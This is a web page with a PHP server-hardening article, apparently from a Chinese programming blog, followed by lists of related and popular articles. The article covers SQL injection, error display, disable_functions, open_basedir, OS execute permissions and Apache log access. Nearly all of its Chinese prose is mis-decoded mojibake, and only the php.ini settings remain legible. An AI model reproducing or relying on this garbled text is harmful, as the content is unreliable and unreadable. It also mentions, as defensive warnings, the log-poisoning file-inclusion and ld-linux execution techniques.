ÓÉÓÚ±aÁ¿Ã»ÓÐÓõ¥ÒýºÅÀ(C)ÆðÀ´£¬¾Í»aÔi³Ésql_inject¹¥»÷¡£ÐÒ¿÷MySQL¹¦Äܼoµ¥£¬Ã»ÓÐsqlserverµÈÊý¾Ý¿aÓÐÖ´ÐÐÃuÁiµÄSQLÓi¾a£¬¶øÇÒPHPµÄmysql_query()º¯ÊýÒ²Ö»ÔÊÐiÖ´ÐÐÒ»ÌoSQLÓi¾a£¬ËuÒÔÓÃ*ֺŸo¿ª¶aÌoSQLÓi¾aµÄ¹¥»÷Ò²²»ÄÜ×aЧ¡£µ«Êǹ¥»÷ÕßÆðÂe»¹¿ÉÒÔÈòeѯÓi¾a³o´i£¬Ð¹Â(C)ϵͳµÄÒ»Ð(C)ÐÅÏ¢£¬»oÕßÒ»Ð(C)ÒaÏe²»µ½µÄÇe¿o¡£

½a¾o½¨£º

ÒªÇo³ÌÐoÔ±¶ÔËuÓÐÓû§Ìa½»µÄÒª*ŵ½SQLÓi¾aµÄ±aÁ¿½øÐйýÂË¡£
¼´Ê¹ÊÇÊý×ÖÀaÐ͵Ä×ֶΣ¬±aÁ¿Ò²ÒªÓõ¥ÒýºÅÀ(C)ÆðÀ´£¬MySQL×Ô¼º»a°Ñ×Ö´®´¦Ài³ÉÊý×Ö¡£
ÔÚMySQLÀi²»Òª¸øPHP³ÌÐo¸ß¼¶±ðȨÏÞµÄÓû§£¬Ö»ÔÊÐi¶Ô×Ô¼ºµÄ¿a½øÐвÙ×÷£¬ÕaÒ²±ÜÃaÁ˳ÌÐo³oÏÖÎÊÌa±» SELECT INTO OUTFILE ... ÕaÖÖ¹¥»÷¡£

8¡¢¾¯¸ae¼°´iÎoÐÅÏ¢

PHPĬÈÏÏÔʾËuÓеľ¯¸ae¼°´iÎoÐÅÏ¢£º

error_reporting = E_ALL & ~E_NOTICE
display_errors = On

ÔÚƽʱ¿ª¢µ÷ÊÔʱÕadz£ÓÐÓ㬿ÉÒÔ¸u¾Ý¾¯¸aeÐÅÏ¢ÂiÉÏÕÒµ½³ÌÐo´iÎoËuÔÚ¡£
ÕýʽӦÓÃʱ£¬¾¯¸ae¼°´iÎoÐÅÏ¢ÈÃÓû§²»ÖªËu´e£¬¶øÇÒ¸ø¹¥»÷ÕßйÂ(C)Á˽ű¾ËuÔÚµÄÎiÀi¾¶£¬Îª¹¥»÷ÕߵĽøÒ»²½¹¥»÷Ìa¹(C)ÁËÓÐÀuµÄÐÅÏ¢¡£¶øÇÒÓÉÓÚ×Ô¼ºÃ»ÓÐÃÎʵ½´iÎoµÄµØ½£¬´¶ø²»Äܼ°Ê±Ð޸ijÌÐoµÄ´iÎo¡£ËuÒÔ°ÑPHPµÄËuÓо¯¸ae¼°´iÎoÐÅÏ¢¼Ç¼µ½Ò»¸oÈÕÖ¾ÎļþÊÇdz£Ã÷Öǵģ¬¼´²»¸ø¹¥»÷ÕßйÂ(C)ÎiÀi¾¶£¬ÓÖÄÜÈÃ×Ô¼ºÖªµÀ³ÌÐo´iÎoËuÔÚ¡£

ÐÞ¸Äphp.iniÖйØÓÚError handling and logging²¿*ÖÄÚÈÝ£º

error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log

È»ºoÖØÆoapache£¬×¢ÒaÎļþ/usr/local/apache/logs/php_error.log±ØÐe¿ÉÒÔÈÃnobodyÓû§¿Éд¡£

9¡¢disable_functions

Èç¹u¾oµÃÓÐÐ(C)º¯Êý»¹ÓÐÍþв£¬¿ÉÒÔÉeÖÃphp.iniÀiµÄdisable_functions£¨Õa¸oÑ¡Ïi²»ÄÜÔÚhttpd.confÀiÉeÖã(C)£¬±ÈÈ磺

disable_functions = phpinfo, get_cfg_var

¿ÉÒÔÖ¸¶¨¶a¸oº¯Êý£¬ÓöººÅÖ¿ª¡£ÖØÆoapacheºo£¬phpinfo, get_cfg_varº¯Êý¶¼±»½uÖ¹ÁË¡£½¨Òe¹Ø±Õº¯Êýphpinfo, get_cfg_var£¬ÕaÁ½¸oº¯ÊýÈÝÒ×йÂ(C)þÎñÆ÷ÐÅÏ¢£¬¶øÇÒûÓÐʵ¼ÊÓô¦¡£

10¡¢disable_classes

Õa¸oÑ¡ÏiÊÇ´ÓPHP-4.3.2¿ªÊ¼²ÅÓеģ¬Ëu¿ÉÒÔ½uÓÃijÐ(C)Àa£¬Èç¹uÓжa¸oÓöººÅ*Ö¸oÀaÃu¡£disable_classesÒ²²»ÄÜÔÚhttpd.confÀiÉeÖã¬Ö»ÄÜÔÚphp.iniÅaÖÃÎļþÀiÐ޸ġ£

11¡¢open_basedir

Ç°ÃaeÖÎoÀý³ÌµÄʱºoÒ²¶a´ÎÌaµ½ÓÃopen_basedir¶Ô½Å±¾²Ù×÷¾¶½øÐÐÏÞÖÆ£¬ÕaÀiÔÙ½eÉÜÒ»ÏÂËuµÄÌØÐÔ¡£ÓÃopen_basedirÖ¸¶¨µÄÏÞÖÆʵ¼ÊÉÏÊÇǰ׺£¬²»ÊÇĿ¼Ãu¡£Ò²¾ÍÊÇ˵ "open_basedir = /dir/incl" Ò²»aÔÊÐiÃÎÊ "/dir/include" ºÍ "/dir/incls"£¬Èç¹uËuÃÇ´aeÔڵĻ°¡£Èç¹uÒª½«ÃÎÊÏÞÖÆÔÚ½oΪָ¶¨µÄĿ¼£¬ÓÃбÏß½aÊø¾¶Ãu¡£ÀýÈ磺"open_basedir = /dir/incl/"¡£
¿ÉÒÔÉeÖöa¸oĿ¼£¬ÔÚWindowsÖУ¬ÓÃÖºÅÖ¸oĿ¼¡£ÔÚÈκÎÆaËuϵͳÖÐÓÃðºÅÖ¸oĿ¼¡£×÷ΪApacheÄ£¿eʱ£¬¸¸Ä¿Â¼ÖеÄopen_basedirÂ*¾¶×Ô¶¯±»¼Ì³Ð¡£

ËÄ¡¢ÆaËu°²È«ÅaÖÃ

1¡¢È¡ÏuÆaËuÓû§¶Ô³£Óá¢ÖØҪϵͳÃuÁiµÄ¶ÁдִÐÐȨÏÞ

Ò»°a¹ÜÀiԱά»¤Ö»ÐeÒ»¸oÆÕͨÓû§ºÍ¹ÜÀiÓû§£¬³ýÁËÕaÁ½¸oÓû§£¬¸øÆaËuÓû§Äܹ»Ö´ÐкÍÃÎʵĶ«Î÷Ó¦¸ÃÔ½ÉÙÔ½ºÃ£¬ËuÒÔÈ¡ÏuÆaËuÓû§¶Ô³£Óá¢ÖØҪϵͳÃuÁiµÄ¶ÁдִÐÐȨÏÞÄÜÔÚ³ÌÐo»oÕßþÎñ³oÏÖÂ(C)¶´µÄʱºo¸ø¹¥»÷Õß´øÀ´ºÜ´oµÄÃÔ»o¡£¼Çסһ¶¨ÒªÁ¬¶ÁµÄȨÏÞҲȥµo£¬ñÔoÔÚlinuxÏ¿ÉÒÔÓÃ/lib/ld-linux.so.2 /bin/lsÕaÖֽʽÀ´Ö´ÐС£
Èç¹uҪȡÏuij³ÌÈç¹uÊÇÔÚchroot»¾³Ài£¬Õa¸o¹¤×÷±È½ÏÈÝÒ×ʵÏÖ£¬ñÔo£¬ÕaÏi¹¤×÷»¹ÊÇÓÐÐ(C)ÌoÕ½µÄ¡£ÒoΪȡÏuÒ»Ð(C)³ÌÐoµÄÖ´ÐÐȨÏÞ»aµ¼ÖÂÒ»Ð(C)þÎñÔËÐв»Õý³£¡£PHPµÄmailº¯ÊýÐeÒª/bin/shÈ¥µ÷ÓÃsendmail¢ÐÅ£¬ËuÒÔ/bin/bashµÄÖ´ÐÐȨÏÞ²»ÄÜÈ¥µo¡£ÕaÊÇÒ»Ïi±È½ÏÀÛÈ˵Ť×÷£¬

2¡¢È¥µoapacheÈÕÖ¾ÆaËuÓû§µÄ¶ÁȨÏÞ

apacheµÄaccess-log¸øÒ»Ð(C)³oÏÖ±¾µØ°uº¬Â(C)¶´µÄ³ÌÐoÌa¹(C)Á˽±aÖ®ÃÅ¡£Í¨¹ýÌa½»°uº¬PHP´uÂeµÄURL£¬¿ÉÒÔʹaccess-log°uº¬PHP´uÂe£¬ÄÇô°Ñ°uº¬ÎļþÖ¸Ïoaccess-log¾Í¿ÉÒÔÖ´ÐÐÄÇÐ(C)PHP´uÂe£¬´Ó¶ø»ñµÃ±¾µØÃÎÊȨÏÞ¡£
Èç¹uÓÐÆaËuÐeÄaÖ÷»u£¬Ò²Ó¦¸ÃÏaӦȥµo¸ÃÈÕÖ¾ÎļþÆaËuÓû§µÄ¶ÁȨÏÞ¡£

µ±È»£¬Èç¹uÄa°´ÕÕÇ°Ãae½eÉܵÄÅaÖÃPHPÄÇôһ°aÒѾ­ÊÇÎÞ*¨¶ÁÈ¡ÈÕÖ¾ÎļþÁË¡£

 相关文章:
PHP分页显示制作详细讲解
PHP   ·   发表于 5年以前   ·   阅读量:8296
SSH 登录失败:Host key verification failed
Shell   ·   发表于 5年以前   ·   阅读量:3356
获取IMSI
JAVA   ·   发表于 5年以前   ·   阅读量:3013
将二进制数据转为16进制以便显示
JAVA   ·   发表于 5年以前   ·   阅读量:3004
获取IMEI
JAVA   ·   发表于 5年以前   ·   阅读量:2842
文件下载
JAVA   ·   发表于 5年以前   ·   阅读量:2839
贪吃蛇
JAVA   ·   发表于 5年以前   ·   阅读量:2835
双位运算符
JavaScript   ·   发表于 4年以前   ·   阅读量:2830
PHP自定义函数获取搜索引擎来源关键字的方法
PHP   ·   发表于 5年以前   ·   阅读量:2773
Java生成UUID
JAVA   ·   发表于 5年以前   ·   阅读量:2768
发送邮件
Shell   ·   发表于 1年以前   ·   阅读量:2761
年的日历图
Python   ·   发表于 4年以前   ·   阅读量:2685
提取后缀名
Python   ·   发表于 4年以前   ·   阅读量:2672
在Zeus Web Server中安装PHP语言支持
PHP   ·   发表于 5年以前   ·   阅读量:2519
让你成为最历害的git提交人
Shell   ·   发表于 5年以前   ·   阅读量:2511
Yii2汉字转拼音类的实例代码
PHP   ·   发表于 5年以前   ·   阅读量:2431
再谈PHP中单双引号的区别详解
PHP   ·   发表于 5年以前   ·   阅读量:2427
指定应用ID以获取对应的应用名称
JAVA   ·   发表于 5年以前   ·   阅读量:2417
Python 2与Python 3版本和编码的对比
Python   ·   发表于 5年以前   ·   阅读量:2394
php封装的page分页类完整实例
PHP   ·   发表于 5年以前   ·   阅读量:2378
 最新文章
获取php时间戳
4年以前 · 730 次阅读
php获取tempfile路径
4年以前 · 896 次阅读
php 1,1,2,3,5,8,13,21,34...求第30位的数是多少?
4年以前 · 871 次阅读
PHP执行shell
4年以前 · 872 次阅读
PHP获取HTTP body内容
5年以前 · 1157 次阅读
php读取目录下的所有文件
5年以前 · 976 次阅读
php判断是爬虫在访问还是用户浏览器在访问
5年以前 · 904 次阅读
PHP通过UserAgent识别爬虫
5年以前 · 997 次阅读
PHP使用curl发起post请求
5年以前 · 988 次阅读
PHP版HelloWorld
5年以前 · 820 次阅读
 最受欢迎文章
PHP分页显示制作详细讲解
5年以前 · 8296 次阅读
PHP自定义函数获取搜索引擎来源关键字的方法
5年以前 · 2773 次阅读
在Zeus Web Server中安装PHP语言支持
5年以前 · 2519 次阅读
Yii2汉字转拼音类的实例代码
5年以前 · 2431 次阅读
再谈PHP中单双引号的区别详解
5年以前 · 2427 次阅读
php封装的page分页类完整实例
5年以前 · 2378 次阅读
php+ajax+json 详解及实例代码
5年以前 · 2316 次阅读
php数组合并array_merge()函数使用注意事项
5年以前 · 2285 次阅读
PHP设计模式之工厂模式与单例模式
5年以前 · 2275 次阅读
PHP实现简单爬虫的方法
5年以前 · 2266 次阅读